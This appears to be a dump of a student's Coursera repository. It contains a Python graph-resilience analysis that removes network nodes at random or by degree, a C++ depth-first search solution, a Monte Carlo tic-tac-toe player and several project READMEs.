"text": "\"\"\"\nSolutiion for Application #2: \"Analysis of a Computer Network\"\n\"\"\"\n\nimport time\nimport random\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport alg_application2_provided as alg_app2_prov\nimport alg_example_graphs as alg_graphs\nimport alg_project2_solution as alg_proj2_sol\n\n##### Q1 Solution #####\n# To begin our analysis, we will examine the resilience of the computer network under \n# an attack in which servers are chosen at random. We will then compare the resilience \n# of the network to the resilience of ER and UPA graphs of similar size.\n#\n# To begin, you should determine the probability pp such that the ER graph computed \n# using this edge probability has approximately the same number of edges as the computer \n# network. (Your choice for pp should be consistent with considering each edge in the \n# undirected graph exactly once, not twice.) Likewise, you should compute an integer mm \n# such that the number of edges in the UPA graph is close to the number of edges in the \n# computer network. Remember that all three graphs being analyzed in this Application \n# should have the same number of nodes and approximately the same number of edges.\n\n# load the graph from a text file\ncnet_graph = alg_app2_prov.load_graph(alg_app2_prov.NETWORK_URL)\n\n# get the number of nodes in the computer network graph\nnum_nodes = len(cnet_graph.keys())\n\n# find the total number of edges in th computer network graph\nedges = sum([len(neighbors) for neighbors in cnet_graph.values()])/2\n\n# find the probability such that the ER graph computed using this edge \n# probability has approximately the same number of edges as the computer network\nprob_p = round(2.0 * edges / (num_nodes * (num_nodes - 1.0)), 6)\n\n# get the average degree so that the graph created using UPA algorithm has approximately \n# same number of edges as network_graph\nm_nodes = int(round(float(edges)/num_nodes))\n\n# generate the random graph based on ER algorithm\ner_graph = alg_graphs.alg_er(num_nodes, prob_p)\n\n# generate the random graph based on UPA algorithm\nupa_graph = alg_graphs.alg_upa(num_nodes, m_nodes)\n\n# Next, you should write a function random_order that takes a graph and returns a list \n# of the nodes in the graph in some random order. Then, for each of the three graphs \n# (computer network, ER, UPA), compute a random attack order using random_order and use \n# this attack order in compute_resilience to compute the resilience of the graph.\n\ndef random_order(graph):\n \"\"\"\n Take a graph a returns a random sequence of its nodes \n Arguments:\n graph {dictionary} -- [a graph]\n \n Returns:\n list of nodes -- random sequence of nodes\n \"\"\"\n\n lst_nodes = graph.keys()\n random.shuffle(lst_nodes)\n\n return lst_nodes\n\n# compute the resilience of each of the 3 graphs\ncnet_res = alg_proj2_sol.compute_resilience(cnet_graph, random_order(cnet_graph))\ner_res = alg_proj2_sol.compute_resilience(er_graph, random_order(er_graph))\nupa_res = alg_proj2_sol.compute_resilience(upa_graph, random_order(upa_graph))\n\n# Once you have computed the resilience for all three graphs, plot the results as three \n# curves combined in a single standard plot (not log/log). Use a line plot for each curve. \n# The horizontal axis for your single plot be the the number of nodes removed (ranging \n# from zero to the number of nodes in the graph) while the vertical axis should be the \n# size of the largest connect component in the graphs resulting from the node removal. 
\n# For this question (and others) involving multiple curves in a single plot, please \n# include a legend in your plot that distinguishes the three curves. The text labels in \n# this legend should include the values for pp and mm that you used in computing the ER \n# and UPA graphs, respectively. Both matplotlib and simpleplot support these capabilities \n# (matplotlib example and simpleplot example).\n# \n# Note that three graphs in this problem are large enough that using CodeSkulptor to \n# calculate compute_resilience for these graphs will take on the order of 3-5 minutes \n# per graph. When using CodeSkulptor, we suggest that you compute resilience for each \n# graph separately and save the results (or use desktop Python for this part of the \n# computation). You can then plot the result of all three calculations using simpleplot.\n# load the graph from the text file\n\n# compute the list of number of nodes removed (ranging from zero to the number of nodes in the graph)\nnum_removed = range(num_nodes + 1)\n\n# plot the graphs of resilience vs number of nodes removed for each of the 3 graphs\nplt.figure(0)\nplt.plot(num_removed, cnet_res, '-b', label = 'computer network')\nplt.plot(num_removed, er_res, '-r', label = 'ER graph p = 0.00397')\nplt.plot(num_removed, upa_res, '-k', label = 'UPA graph m = 2')\nplt.title('Graph resilience comparision for random attack')\nplt.xlabel('number of nodes removed')\nplt.ylabel('size of the largest connected component')\nplt.legend(loc = 'upper right')\nplt.xlim(0, None)\nplt.ylim(0, 1400)\nplt.grid()\n# uncommet to save the plot \n#plt.savefig(\"Q1_graph_resilience_comparision.png\")\n\n##### Q2 Solution #####\n# Consider removing a significant fraction of the nodes in each graph \n# using random_order. We will say that a graph is resilient under this \n# type of attack if the size of its largest connected component is \n# roughly (within ~25%) equal to the number of nodes remaining, after \n# the removal of each node during the attack.\n#\n# Examine the shape of the three curves from your plot in Question 1. \n# Which of the three graphs are resilient under random attacks as the \n# first 20% of their nodes are removed?\n#\n# Ans: all 3 graphs seem to be resilient, i.e the size of the largest \n# connected component is within 25% of 1000 ( the approximate number of\n# remaing nodes)\n\n##### Q3 Solution #####\n# In the next three problems, we will consider attack orders in which the \n# nodes being removed are chosen based on the structure of the graph. A \n# simple rule for thesetargeted attacks is to always remove a node of \n# maximum (highest) degree from the graph. The function targeted_order(ugraph) \n# in the provided code takes an undirected graph ugraph and iteratively does \n# the following:\n# \n# - Computes a node of the maximum degree in ugraph. If multiple nodes have \n# the maximum degree, it chooses any of them (arbitrarily).\n# - Removes that node (and its incident edges) from ugraph.\n#\n# Observe that targeted_order continuously updates ugraph and always computes \n# a node of maximum degree with respect to this updated graph. The output of \n# targeted_order is a sequence of nodes that can be used as input to compute_resilience.\n# \n# As you examine the code for targeted_order, you feel that the provided \n# implementation of targeted_order is not as efficient as possible. In \n# particular, much work is being repeated during the location of nodes \n# with the maximum degree. 
In this question, we will consider an alternative \n# method (which we will refer to as fast_targeted_order) for computing the \n# same targeted attack order. In Python, this method creates a list \n# degree_sets whose kth element is the set of nodes of degree k. The method \n# then iterates through the list degree_sets in order of decreasing degree. \n# When it encounter a non-empty set, the nodes in this set must be of \n# maximum degree. The method then repeatedly chooses a node from this set, \n# deletes that node from the graph, and updates degree_sets appropriately.\n# \n# For this question, your task is to implement fast_targeted_order and then \n# analyze the running time of these two methods on UPA graphs of size n with \n# m = 5. \n\n# Determine big-O bounds of the worst-case running times of targeted_order \n# and fast_targeted_order as a function of the number of nodes n in the UPA graph.\n# Since the number of edges in these UPA graphs is always less than 5n (due to the \n# choice of m = 5), your big-O bounds for both functions should be expressions in n. \n# You should also assume that the all of the set operations used in fast_targeted_order \n# are O(1).\n#\n# Ans: target_order = O(n^2 + m) = O(n^2) since for UPA graph m <= 5n (m = total \n# number of edges in UPA)\n# fast_target_order = O(n + m) = O(n) since for UPA graph m <= 5n (m = total\n# number of edges in UPA)\n\n# Next, run these two functions on a sequence of UPA graphs with n in range(10,1000,10) \n# and m=5 and use the time module (or your favorite Python timing utility) to compute \n# the running times of these functions. Then, plot these running times (vertical axis) \n# as a function of the number of nodes n (horizontal axis) using a standard plot \n# (not log/log). Your plot should consist of two curves showing the results of your \n# timings. Remember to format your plot appropriately and include a legend. The title \n# of your plot should indicate the implementation of Python (desktop Python vs. CodeSkulptor) \n# used to generate the timing results.\n\ndef fast_targeted_order(graph):\n \"\"\"\n Compute a targeted attack order consisting of nodes of \n maximal degree. 
The algorithm used was provided.\n\n Arguments:\n graph {dictionary} -- a graph\n \n Returns:\n list of nodes -- a list of nodes of attack order with maximal\n degree in descending order\n \"\"\"\n\n # intialize the list with the target node order\n node_order = []\n\n # make a copy of the node\n graph_cpy = alg_app2_prov.copy_graph(graph)\n\n # get all the nodes of the graph\n nodes = graph_cpy.keys()\n\n # initialize all degree set so that all degree corresponds to empty set of nodes\n degree_set = [set() for dummy_idx in nodes]\n\n # add all the nodes to their corresponding degree location\n for node in nodes:\n degree = len(graph_cpy[node])\n degree_set[degree].add(node)\n\n # update the degree set and delete the node of the copy of graph appropriately after \n # storing the node with current maximal degree \n for deg_set_idx in range(len(nodes) - 1, -1, -1):\n while(len(degree_set[deg_set_idx]) != 0):\n node_u = degree_set[deg_set_idx].pop()\n for neighbor in graph_cpy[node_u]:\n degree_neigbor = len(graph_cpy[neighbor])\n degree_set[degree_neigbor].remove(neighbor)\n degree_set[degree_neigbor - 1].add(neighbor) \n \n node_order.append(node_u)\n alg_app2_prov.delete_node(graph_cpy, node_u)\n\n\n return node_order\n\n# intialize the fast and normal function times for targeted order\ntime_fast_targeted_order = []\ntime_targeted_order = []\n\n# intialize the nodes to be used to generate the UPA graphs\nnodes = range(10, 1000, 10)\n\n# calcualte the time to run the normal and fast functions for the target order\nfor node in nodes:\n # create the UPA graph with n = node and m = 5 where m is the number of \n # existing nodes to which a new node is connected during each iteration\n upa_graph_new = alg_graphs.alg_upa(node, 5)\n # calculate the attack order based on normal targeted order function \n # and store the time it takes to run this function\n start = time.time()\n alg_app2_prov.targeted_order(upa_graph_new)\n end = time.time()\n time_targeted_order.append((end - start) * 1000)\n # calculate the attack order based on fast targeted order function \n # and store the time it takes to run this function\n start = time.time()\n fast_targeted_order(upa_graph_new)\n end = time.time()\n time_fast_targeted_order.append((end - start) * 1000)\n\n# plot the graphs of resilience vs number of nodes removed for each of the 3 graphs\nplt.figure(1)\nplt.plot(nodes, time_targeted_order, '-b', label = 'targeted_order')\nplt.plot(nodes, time_fast_targeted_order, '-k', label = 'fast_targeted_order')\nplt.title('regular vs fast runtime of targeted order in Visual Studio' )\nplt.xlabel('number of nodes of UPA graph for m = 5')\nplt.ylabel('run times[msec]')\nplt.legend(loc = 'upper left')\nplt.xlim(10, None)\nplt.ylim(0, None)\nplt.grid()\n# uncommet to save the plot \n#plt.savefig(\"Q3_targeted_order_time_comparision.png\")\n\n##### Q4 Solution #####\n# To continue our analysis of the computer network, we will examine its resilience \n# under an attack in which servers are chosen based on their connectivity. We will \n# again compare the resilience of the network to the resilience of ER and UPA graphs \n# of similar size.\n# \n# Using targeted_order (or fast_targeted_order), your task is to compute a targeted \n# attack order for each of the three graphs (computer network, ER, UPA) from Question 1. \n# Then, for each of these three graphs, compute the resilience of the graph using \n# compute_resilience. Finally, plot the computed resiliences as three curves (line plots) \n# in a single standard plot. 
As in Question 1, please include a legend in your plot that \n# distinguishes the three plots. The text labels in this legend should include the values \n# for p and m that you used in computing the ER and UPA graphs, respectively.\n\n# compute the target order for the 3 graph in Q1\ntar_order_cnet = fast_targeted_order(cnet_graph)\ntar_order_er = fast_targeted_order(er_graph)\ntar_order_upa = fast_targeted_order(upa_graph)\n\n# compute the resilience for the 3 graph using the targeted order\n# compute the resilience of each of the 3 graphs\ncnet_res = alg_proj2_sol.compute_resilience(cnet_graph, tar_order_cnet)\ner_res = alg_proj2_sol.compute_resilience(er_graph, tar_order_er)\nupa_res = alg_proj2_sol.compute_resilience(upa_graph, tar_order_upa)\n\n# plot the computer resilience for the targeted order for the 3 graph\nplt.figure(2)\nplt.plot(num_removed, cnet_res, '-b', label = 'computer network')\nplt.plot(num_removed, er_res, '-r', label = 'ER graph p = 0.00397')\nplt.plot(num_removed, upa_res, '-k', label = 'UPA graph m = 2')\nplt.title('Graph resilience comparision for targeted order')\nplt.xlabel('number of nodes removed')\nplt.ylabel('size of the largest connected component')\nplt.legend(loc = 'upper right')\nplt.xlim(0, None)\nplt.ylim(0, 1400)\nplt.grid()\nplt.show()\n# uncommet to save the plot \n#plt.savefig(\"Q4_graph_resilience_comparision.png\")\n\n##### Q5 Solution #####\n# Examine the shape of the three curves from your plot in Question 4. \n# Which of the three graphs are resilient under targeted attacks as \n# the first 20% of their nodes are removed? Again, note that there is \n# no need to compare the three curves against each other in your answer \n# to this question.\n#\n# Ans: From the graph we can see that only ER graph is resilient as the \n# first 20% of the nodes are removed while the UPA and the computer\n# network graph reaches close to zero as 20% of the ndoes are removed\n"
},
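compute_resilience comes from alg_project2_solution, which is not included in this section. For orientation only, here is a BFS sketch of the quantity it tracks — the size of the largest connected component — making no assumptions about the project module's actual implementation:

```python
from collections import deque

def largest_cc_size(ugraph):
    """Size of the largest connected component of an undirected graph
    given as {node: set_of_neighbors}."""
    visited, best = set(), 0
    for start in ugraph:
        if start in visited:
            continue
        queue, comp_size = deque([start]), 0
        visited.add(start)
        while queue:
            node = queue.popleft()
            comp_size += 1
            for nbr in ugraph[node]:
                if nbr not in visited:
                    visited.add(nbr)
                    queue.append(nbr)
        best = max(best, comp_size)
    return best

# two components of sizes 2 and 3
ugraph = {0: {1}, 1: {0}, 2: {3}, 3: {2, 4}, 4: {3}}
assert largest_cc_size(ugraph) == 3
```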
{
"alpha_fraction": 0.8030231595039368,
"alphanum_fraction": 0.8101086616516113,
"avg_line_length": 210.8000030517578,
"blob_id": "923ee98e7486a75070f25e673e853bd337285879",
"content_id": "0f5d3ca429d1c36a9259e827e0392f8331313c2f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2117,
"license_type": "no_license",
"max_line_length": 1098,
"num_lines": 10,
"path": "/Fundamentals of Computing Specialization/Interactive Programming in Python (Part 2)/Mini-Project7 Spaceship/README.md",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "# Mini-project #7 - Spaceship\n\nImplemented a simple version of the classic arcade game Asteroids in CodeSkulptor, a browser-based Python interpreter, as part of the coursework. To play the game go [here](http://www.codeskulptor.org/#user46_dC7ba6vMF6_12.py) and press the play button on the top left corner. This mini-project only implements part of the game including features to control the spaceship, fire missiles and spawn one rock. The next mini-project completes the game to allow for rock explosion and animations with space ship missiles, update the lives that the player has after collision with the rocks, spawn numerous rocks and other minor features.\n\nTo navigate the spaceship use the arrow keys and to fire missiles use the spacebar. Only one missile can be fired and it will not die down.\n\nMini-project overview taken from course page can be found below:\n* In our last two mini-projects, we will build a 2D space game RiceRocks that is inspired by the classic arcade game Asteroids (1979). Asteroids is a relatively simple game by today's standards, but was still immensely popular during its time. In the game, the player controls a spaceship via four buttons: two buttons that rotate the spaceship clockwise or counter clockwise (independent of its current velocity), a thrust button that accelerates the ship in its forward direction and a fire button that shoots missiles. Large asteroids spawn randomly on the screen with random velocities.The player's goal is to destroy these asteroids before they strike the player's ship. In the arcade version, a large rock hit by a missile split into several fast moving small asteroids that themselves must be destroyed. Occasionally, a flying saucer also crosses the screen and attempts to destroy the player's spaceship. Searching for \"asteroids arcade\" yields links to multiple versions of Asteroids that are available on the web (including an updated version by Atari, the original creator of Asteroids).\n\nComplete Mini-Project Description can be found at: <https://www.coursera.org/learn/interactive-python-2/supplement/2ZVsF/mini-project-description>"
},
{
"alpha_fraction": 0.7987987995147705,
"alphanum_fraction": 0.8054053783416748,
"avg_line_length": 91.55555725097656,
"blob_id": "3e1ab6b0d116da600b9bfe2e10bf28e685caa10c",
"content_id": "33dd8e28e68e54f384500f7515dc8a29af9948ed",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1665,
"license_type": "no_license",
"max_line_length": 699,
"num_lines": 18,
"path": "/Fundamentals of Computing Specialization/Algorithmic Thinking (Part 2)/Module 3/README.md",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "# Project and Application Overviews\n## Project #3: Closest Pairs and Clustering Algorithm\n\n* For the Project and Application portion of Module 3, you will implement and assess two methods for clustering data. For Project 3, you will also implement two methods for [computing closest pairs](https://storage.googleapis.com/codeskulptor-alg/pdf/ClosestPair.pdf) and [two methods for clustering data](https://storage.googleapis.com/codeskulptor-alg/pdf/Clustering.pdf). In Application 3, you will then compare these two clustering methods in terms of efficiency, automation, and quality. We suggest that you review [this handout](https://storage.googleapis.com/codeskulptor-alg/pdf/ClosestPairsAndClustering.pdf) with the pseudo-code for the methods that you will implement before your proceed.\n\nComplete project description can be found at : \n<https://www.coursera.org/learn/algorithmic-thinking-2/supplement/wwmnE/project-3-description>\n\n## Application #3: Comparison of Clustering Algorithms\n\n* In Project 3, you implemented two methods for clustering sets of data. In this Application, we will analyze the performance of these two methods on various subsets of our county-level cancer risk data set. In particular, we will compare these two clustering methods in three areas:\n\n * Efficiency - Which method computes clusterings more efficiently?\n * Automation - Which method requires less human supervision to generate reasonable clusterings?\n * Quality - Which method generates clusterings with less error?.\n\nComplete application description can be found at : \n<https://www.coursera.org/learn/algorithmic-thinking-2/supplement/i0HYj/application-3-description>"
},
{
"alpha_fraction": 0.5381453633308411,
"alphanum_fraction": 0.567685604095459,
"avg_line_length": 29.958677291870117,
"blob_id": "6de73db4a184bdbc7cc6d1652af1fb710da878fb",
"content_id": "7849dd0c90c9c0ceac9a673f0d071e32998bc629",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3903,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 121,
"path": "/Algorithms on Graphs/Assignment1/reach.cpp",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "// file: reach.cpp\r\n// author: Shamsuddin Rehmani\r\n// date: 2016-07-01\r\n// description: Problem 1 of the first assignment of Algorithms on Graphs\r\n//\t\t\t\tby University of California, San Diego & Higher School of Economics on Coursera\r\n//\r\n//\t\t\t\tThe task was : Given an undirected graph and two distinct vertices u and v, \r\n//\t\t\t\tcheck if there is a path between u and v\r\n// \r\n//\t\t\t\tStarter file with main function was already provided but implementation of\r\n//\t\t\t\treach function and testing had to be completed\r\n//\t\t\t\t\r\n//\t\t\t\tThe file passed all 20 test on Coursera with\r\n//\t\t\t\tmax time used: 0.01/1.00 sec, max memory used: 7.73/512 MB. \r\n\r\n#include <iostream>\r\n#include <vector>\r\n\r\nusing std::vector;\r\n\r\n// Recursively computes whether a path exists between x and y using depth first search\r\n//\r\n// PRE: 1 ≤ adj.size() ≤ 10e3; 0 ≤ x, y ≤ adj.size()-1; x != y\r\n// POST: returns 1 for path between x and y, 0 otherwise\r\n// PARAM: adj = an undirected graph represented in adjacancey list with n vertices and 2*m edges where n is adj.size() \r\n// visited = keeps track of all the vertices that have already been visited\r\n// x = one of the vertice of adj\r\n// y = another vertice of adj not equal to x\r\n\r\nint reach(vector<vector<int> > &adj, vector<bool> visited, int x, int y) {\r\n\r\n\tint value = 0;\r\n\r\n\tvisited[x] = true; // mark the first vertice as true\r\n\r\n\t// iterate for all edges of x\r\n\tfor (vector<int>::size_type v = 0; v < adj[x].size(); v++) {\r\n\r\n\t\tif (visited[adj[x][v]] == false) {\r\n\t\t\tif (adj[x][v] == y) // if the target vertice y is connected to the edge from x, return 1\r\n\t\t\t\treturn 1;\r\n\r\n\t\t\telse {\r\n\t\t\t\tvalue = reach(adj, visited, adj[x][v], y); // perform a depth first search with new x value\r\n\t\t\t\tif (value == 1) // if x = y during the depth first search, return 1.\r\n\t\t\t\t\treturn 1;\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\r\n\r\n\treturn value;\r\n}\r\n\r\nint main() {\r\n\r\n\t// Few test case to check if the reach function works. 
These are commented since the \r\n\t// assignment requires the reach.cpp file to read input values and output the respective\r\n\t// results on the console\r\n\t/**************************************************************************************\r\n\r\n\tint n = 8;\r\n\tvector<bool> visited(n, false);\r\n\tvector<vector<int> > adj(n, vector<int>());\r\n\r\n\r\n\tadj[4 - 1].push_back(1 - 1);\r\n\tadj[1 - 1].push_back(4 - 1);\r\n\tadj[1 - 1].push_back(2 - 1);\r\n\tadj[2 - 1].push_back(1 - 1);\r\n\r\n\tadj[1 - 1].push_back(3 - 1);\r\n\tadj[3 - 1].push_back(1 - 1);\r\n\r\n\tadj[3 - 1].push_back(4 - 1);\r\n\tadj[4 - 1].push_back(3 - 1);\r\n\r\n\tadj[7 - 1].push_back(8 - 1);\r\n\tadj[8 - 1].push_back(7 - 1);\r\n\r\n\t//test Case 1: No neighbours in adjacency list for both nodes\r\n\tif (reach(adj, visited, 5-1, 6-1 ) != 0) {\r\n\tstd::cout << \"Test case 1 failed\" << std::endl;\r\n\t}\r\n\r\n\t//test Case 2: No egde between the two nodes but the nodes have some neighbours\r\n\tif (reach(adj, visited, 7 - 1, 2 - 1) != 0) {\r\n\tstd::cout << \"Test case 2 failed\" << std::endl;\r\n\t}\r\n\r\n\t//test Case 3: a direct edge connecting the two nodes\r\n\tif (reach(adj, visited, 3 - 1, 1 - 1) != 1) {\r\n\tstd::cout << \"Test case 3 failed\" << std::endl;\r\n\t}\r\n\r\n\t//test Case 4: an indirect path connecting the two nodes\r\n\tif (reach(adj, visited, 4 - 1, 2 - 1) != 1) {\r\n\tstd::cout << \"Test case 4 failed\" << std::endl;\r\n\t}\r\n\r\n\tsystem(\"PAUSE\");\r\n\r\n\t**************************************************************************************/\r\n\t// The code below was mostly provided as a part of the starter file for the assignment with few modifications\r\n\r\n\tsize_t n, m;\r\n\tstd::cin >> n >> m;\r\n\tvector<bool> visited(n, false);\r\n\tvector<vector<int> > adj(n, vector<int>());\r\n\tfor (size_t i = 0; i < m; i++) {\r\n\t\tint x, y;\r\n\t\tstd::cin >> x >> y;\r\n\t\tadj[x - 1].push_back(y - 1);\r\n\t\tadj[y - 1].push_back(x - 1);\r\n\t}\r\n\tint x, y;\r\n\tstd::cin >> x >> y;\r\n\tstd::cout << reach(adj, visited, x - 1, y - 1) << std::endl;\r\n\r\n\r\n}\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n"
},
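The recursive C++ reach above copies the visited vector on every call and can recurse deeply on long paths. A hedged, iterative Python counterpart of the same DFS reachability check, exercised against two of the commented test cases (converted to 0-indexed adjacency lists):

```python
def reach(adj, x, y):
    """Return 1 if y is reachable from x in the undirected graph adj
    (a list of neighbor lists), 0 otherwise; iterative DFS."""
    visited = [False] * len(adj)
    stack = [x]
    visited[x] = True
    while stack:
        node = stack.pop()
        if node == y:
            return 1
        for nbr in adj[node]:
            if not visited[nbr]:
                visited[nbr] = True
                stack.append(nbr)
    return 0

# undirected edges from the commented tests: {1,4} {1,2} {1,3} {3,4} {7,8}
adj = [[3, 1, 2], [0], [0, 3], [0, 2], [], [], [7], [6]]
assert reach(adj, 3, 1) == 1   # test case 4: indirect path 4 -> 1 -> 2
assert reach(adj, 6, 1) == 0   # test case 2: no path between 7 and 2
```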
{
"alpha_fraction": 0.6356759071350098,
"alphanum_fraction": 0.6398566365242004,
"avg_line_length": 39.837398529052734,
"blob_id": "13d9dd0466c6814d8bcbab396329f09b0ee0fb71",
"content_id": "408c91461b315d3324e0c9dd3c29fe6b8d2ad798",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5023,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 123,
"path": "/Fundamentals of Computing Specialization/Principles of Computing (Part 1)/Mini-Project3 Tic-Tac-Toe(Monte Carlo)/tic_tac_toe.py",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "\"\"\"\nMonte Carlo Tic-Tac-Toe Player\n\"\"\"\nimport random\nimport poc_ttt_gui\nimport poc_ttt_provided as provided\n\n# Constants for Monte Carlo simulator\n# You may change the values of these constants as desired, but\n# do not change their names.\nNTRIALS = 50 # Number of trials to run\nSCORE_CURRENT = 1.0 # Score for squares played by the current player\nSCORE_OTHER = 1.0 # Score for squares played by the other player\nGAME_IN_PROG = None\nGAME_OVER = -1\n \n# Add your functions here.\ndef mc_trial(board, player):\n \"\"\"\n Takes the current game board and the next player to move.\n Plays a game starting with the given player by making\n random moves. the function should modify the board input.\n \"\"\"\n # while game is in progress\n while (board.check_win() == GAME_IN_PROG):\n # get a list of empty spots on the current game board\n avail_spots = board.get_empty_squares()\n # randomly select the spots from the empty board\n sel_spot_idx = random.randrange(0,len(avail_spots))\n # get the row and column of selected spot\n row = avail_spots[sel_spot_idx][0]\n col = avail_spots[sel_spot_idx][1]\n # place the current player on the spot found on the board\n board.move(row, col, player)\n # switch the player\n player = provided.switch_player(player)\n \n \ndef mc_update_scores(scores, board, player):\n \"\"\"\n Takes a grid of scores (a list of lists) with the same \n dimensions as the Tic-Tac-Toe board, a board from a completed \n game, and which player the machine player is. It then scores \n the completed board and update the scores grid. \n \"\"\"\n if (board.check_win() != provided.DRAW):\n if (player == board.check_win()):\n # set increment score to positive\n incr_score = 1\n else:\n # set incrment score to negative\n incr_score = -1\n\n # iterate over the board\n for row in range(board.get_dim()):\n for col in range(board.get_dim()):\n\n if (player == board.square(row, col)):\n scores[row][col] += (incr_score * SCORE_CURRENT)\n elif (board.square(row, col) != provided.EMPTY):\n scores[row][col] += (-incr_score * SCORE_CURRENT)\n\ndef get_best_move(board, scores): \n \"\"\"\n Takes a current board and a grid of scores and returns the (row, col) \n of empty square with the maximum score, randomly return one in case of\n more then one maximum score. Returns none if no empty square is present\n \"\"\"\n # get the locations of empty squares on the game board\n avail_spots = board.get_empty_squares()\n # if not spots available print message and return\n if len(avail_spots) == 0:\n print \"no empty squares available\"\n return \n \n # intialize the max score value to be the value of the first available\n # empty square in the list of empty squares\n max_val = scores[avail_spots[0][0]][avail_spots[0][1]]\n # iterate over all available empty squares and update the max score \n for row, col in avail_spots:\n if scores[row][col] > max_val:\n max_val = scores[row][col]\n \n # store all other occurances of max score if any \n max_val_locs = [(row, col) for row, col in avail_spots \n if max_val == scores[row][col]]\n \n # return either the location of max score or a randomly selected location\n # if more than 1 occurances of max score are present\n return max_val_locs[random.randrange(0, len(max_val_locs))]\n \ndef mc_move(board, player, trials):\n \"\"\"\n Takes a current board, which player the machine player \n is, and the number of trials to run. 
Uses the \n Monte Carlo simulation to return a move for the\n machine player in the form of a (row, column)\n \"\"\"\n # check to see if current game is in progress\n if (board.check_win() == GAME_IN_PROG):\n # initialize a list of lists of all zero values and same dimension\n # as the board\n scores = [[0] * board.get_dim() for dummy_num in range(board.get_dim())]\n for dummy_trial in range(trials):\n # clone the current board configuration to be used for all trials of\n # Monte Carlo(MC) simulation since the MC function mutates the board\n # configuration after MC completion\n board_copy = board.clone()\n # run the MC simulation on a copy of the current board configuration\n mc_trial(board_copy, player)\n # update the scores based on the simulation results\n mc_update_scores(scores, board_copy, player)\n\n return get_best_move(board, scores)\n else:\n print \"Game has already concluded !\"\n\n\n## Test game with the console or the GUI. Uncomment whichever \n## you prefer. Both should be commented out when you submit \n## for testing to save time.\n# provided.play_game(mc_move, NTRIALS, False) \npoc_ttt_gui.run_gui(3, provided.PLAYERX, mc_move, NTRIALS, False)\n"
},
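The mc_trial / mc_update_scores / get_best_move pipeline above depends on CodeSkulptor's poc_ttt_gui and poc_ttt_provided modules, so the file cannot run outside the course environment. Below is a self-contained Python 3 sketch of the same trial, score, pick-best loop on a plain 3x3 list-of-lists board; the names winner, random_playout, and mc_best_move are mine, not the course API, and the board encoding is an assumption.

    import random

    EMPTY, X, O = 0, 1, 2

    def winner(board):
        # rows, columns, and diagonals of a 3x3 board;
        # returns X, O, 0 for a draw, or None while in progress
        lines = [list(row) for row in board] + [list(col) for col in zip(*board)]
        lines.append([board[i][i] for i in range(3)])
        lines.append([board[i][2 - i] for i in range(3)])
        for line in lines:
            if line[0] != EMPTY and line.count(line[0]) == 3:
                return line[0]
        if all(cell != EMPTY for row in board for cell in row):
            return 0
        return None

    def random_playout(board, player):
        # play uniformly random moves until the game ends (mirrors mc_trial)
        while winner(board) is None:
            row, col = random.choice([(r, c) for r in range(3) for c in range(3)
                                      if board[r][c] == EMPTY])
            board[row][col] = player
            player = X if player == O else O
        return winner(board)

    def mc_best_move(board, player, trials=50):
        # score squares over many random playouts, then pick the best empty one
        scores = [[0.0] * 3 for _ in range(3)]
        for _ in range(trials):
            copy = [row[:] for row in board]
            result = random_playout(copy, player)
            if result == 0:
                continue  # draws contribute nothing, as in mc_update_scores
            sign = 1 if result == player else -1
            for r in range(3):
                for c in range(3):
                    if copy[r][c] == player:
                        scores[r][c] += sign
                    elif copy[r][c] != EMPTY:
                        scores[r][c] -= sign
        empties = [(r, c) for r in range(3) for c in range(3) if board[r][c] == EMPTY]
        return max(empties, key=lambda rc: scores[rc[0]][rc[1]])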
{
"alpha_fraction": 0.7850877046585083,
"alphanum_fraction": 0.7926065325737,
"avg_line_length": 113,
"blob_id": "d632db152fe43cdc02126412c13017a0379a6319",
"content_id": "f7e424ba2fcd3d2412ac6d95aff301f397535d0a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1596,
"license_type": "no_license",
"max_line_length": 534,
"num_lines": 14,
"path": "/Fundamentals of Computing Specialization/Principles of Computing (Part 2)/Mini-Project2 Word Wrangler/README.md",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "# Mini-project #2 Word Wrangler\n\nImplemented the game logic and other helper functions for Word Wrangler game in CodeSkulptor, a browser-based Python interpreter, as part of the coursework. To play the game, click [here](http://www.codeskulptor.org/#user46_5gpKzUvHYk_75.py) and press the play button on the top left corner. A window will pop up. The game can then be played by typing in a new word and based on the letters of this word, other words are be guessed.\n\nLink to my test suite for the game logic:\n<http://www.codeskulptor.org/#user46_mxRfawLIbQ_5.py>\n\nMini-project overview taken from course page can be found below:\n* In this mini-project we will create a simple word game. The game will take an input word and then generate all valid words that can be created using the letters in the input word. You will then play the game by guessing all of the words. The objective of this mini-project is to work with ordered lists and recursion. While it is possible to write the functions in other ways, we strongly encourage you to follow the spirit of the mini-project. The only way to become more comfortable with recursion is to write recursive functions!\n\n* We have provided a working GUI and a class to manage the state of the game. You will be responsible for writing several helper functions. These functions will be used by the provided code in order to build the list of valid words that are composed of letters from the input word.\n\nComplete project description can be found at: \n<https://www.coursera.org/learn/principles-of-computing-2/supplement/xl26r/mini-project-description>\n"
},
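The README above describes helper functions that generate every string buildable from the input word's letters. A minimal stand-alone sketch of that recursive generator (my own reconstruction of the gen_all_strings helper the course assigns; duplicates are kept, as in the assignment):

    def gen_all_strings(word):
        # all strings formed from the letters of word, in any order
        if not word:
            return [""]
        first, rest = word[0], gen_all_strings(word[1:])
        result = list(rest)
        # insert the first letter into every position of every shorter string
        for s in rest:
            for i in range(len(s) + 1):
                result.append(s[:i] + first + s[i:])
        return result

For example, sorted(gen_all_strings("ab")) gives ['', 'a', 'ab', 'b', 'ba'].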
{
"alpha_fraction": 0.7521428465843201,
"alphanum_fraction": 0.7742857336997986,
"avg_line_length": 126.2727279663086,
